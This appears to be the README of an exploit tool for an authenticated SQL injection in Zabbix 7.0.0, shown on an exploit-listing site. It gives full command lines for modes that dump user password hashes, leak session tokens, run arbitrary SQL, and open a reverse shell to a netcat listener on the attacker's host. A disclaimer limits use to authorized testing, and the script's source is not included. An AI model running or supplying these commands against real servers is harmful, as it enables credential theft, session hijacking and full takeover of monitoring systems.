## https://sploitus.com/exploit?id=285C1AC6-89F8-5698-9A39-0738786ADA57
# Zabbix 7.0.0 SQL Injection Exploit Script
A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.
> **DISCLAIMER:**
> This script is for **educational** and **authorized penetration testing** purposes only.
> Do **not** use it on systems you do not own or have explicit permission to test.
> The author is not responsible for any misuse or damage caused by this tool.
---
## Features
- Authenticated SQL Injection against Zabbix 7.0.0
- Dump user hashes from the DB
- Leak session tokens
- Remote code execution via reverse shell (admin token required)
- Run custom SQL queries
---
## Requirements
- Python 3.6+
- `requests` library
Install requirements if needed:
```bash
pip install requests
```
## Usage
```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```
## Available Modes
| Mode | Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users | Dumps all user IDs, usernames, password hashes, and roles | No |
| leak-tokens | Dumps all active session IDs from the database | No |
| rce | Spawns a reverse shell via item.create exploit | Yes |
| custom | Run any custom SQL query via the injection | No |
## Examples
Dump User Hashes
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```
Leak Session Tokens
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```
Remote Code Execution (Reverse Shell)
```bash
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```
Custom SQL Injection
```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```
## Project Structure
```bash
sqliZabbix.py # Main exploit script
README.md # This documentation
```
## Author
Anthony (@874anthony)
Crafted with love & curiosity
## License
This project is released under the MIT License. Please use responsibly.